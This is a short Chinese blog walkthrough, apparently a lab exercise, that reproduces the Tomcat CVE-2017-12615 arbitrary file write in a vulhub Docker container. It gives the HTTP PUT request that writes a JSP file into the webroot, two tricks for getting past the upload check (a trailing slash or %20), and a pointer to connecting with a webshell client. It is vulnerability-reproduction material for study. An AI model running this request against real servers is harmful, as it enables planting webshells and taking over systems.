Tomcat CVE-2017-12615任意文件写入

靶机:Centos 7

攻击机:kali

影响范围:7.0.0-7.0.81

条件:web.xml中设置readonly false(不是默认配置)

步骤:

1、使用vuluhub的docker进行漏洞复现

Sudo docker-compose build(使用 build选项编译镜像)

  1. 启动docker容器docker-compose up -d

  1. 使用docker exec -ti dockerID bash 进入容器

  1. 查看web.xml是否配置readonly false cat conf/web.xml | grep readonly

  1. 抓包使用PUT方法写入文件成功,文件存放在ROOT目录下。

PUT /1.jsp/ HTTP/1.1

Host: your-ip:8080

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 5

shell

  1. 直接上传会被拦截绕过方法有两种第一种是/(linux),保存时是非法的符号会去除,第二种是%20,url编码是空格,保存时也会除去,使用两种方式都可以绕过。

  1. 使用菜刀或者其他webshell连接工具连接即可

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值